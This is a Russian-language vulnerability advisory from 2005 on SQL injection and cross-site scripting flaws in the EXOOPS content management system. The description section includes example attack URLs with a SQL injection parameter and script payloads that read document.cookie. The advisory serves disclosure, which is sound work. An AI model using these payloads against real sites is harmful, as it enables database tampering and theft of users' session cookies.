Security Lab

SQL-инъекция и межсайтовый скриптинг в EXOOPS

Дата публикации:29.03.2005
Всего просмотров:1812
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: EXOOPS

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.

Уязвимость существует в нескольких сценариях при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION

http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/modules/newbb/viewforum.php?
sortname=p.post_time&sortorder=ASC&
sortdays=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script %
3E&forum=25&refresh=Vai

http://[target]/modules/newbb/index.php?
viewcat=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

URL производителя: http://www.exoops.info

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple Sql injection, and multiple XSS vulnerabilities in E-XOOPS